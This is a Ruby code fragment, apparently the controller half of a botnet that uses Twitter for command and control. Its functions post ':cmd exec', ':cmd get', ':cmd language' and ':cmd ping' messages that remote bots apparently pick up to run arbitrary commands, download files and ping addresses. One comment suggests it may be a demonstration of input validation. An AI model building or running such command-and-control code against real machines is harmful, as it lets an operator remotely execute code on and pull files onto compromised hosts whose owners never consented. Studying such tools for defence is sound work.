# Send an exec command, the format for this is :cmd exec <command>
# On a linux system, unless the command is terminated with an & the
# bot will probably block until the command is finished
def send_exec_command(filename, verbose)
	twitter = Twitter::Base.new(SCREEN_NAME, PASSWORD)
	message = ":cmd exec " + filename
	if verbose
		puts "Sending message: " + message
	end
	twitter.post(message)
	if verbose
		puts "Execute command sent"
	end
end

# Send a get command. The bot will download the specified file
def send_get_command(filename, verbose)
	twitter = Twitter::Base.new(SCREEN_NAME, PASSWORD)
	twitter.post(":cmd get " + filename)
	if verbose
		puts "Get command sent"
	end
end

# Change the language to the one specified
def send_new_language_command(language, verbose)
	twitter = Twitter::Base.new(SCREEN_NAME, PASSWORD)
	message=":cmd language " + language
	if verbose
		puts "Sending message: " + message
	end
	twitter.post(message)
	if verbose
		puts "New language command sent"
	end
end

# Send a ping command. The bot will ping the specified IP address
# Only doing IP at the moment so I can show input validation
def send_ping_command(ip_address, verbose)
	twitter = Twitter::Base.new(SCREEN_NAME, PASSWORD)
	message = ":cmd ping " + ip_address
	if verbose
		puts "Sending message: " + message
	end
	twitter.post(message)
	if verbose
		puts "Ping command sent"
	end
end
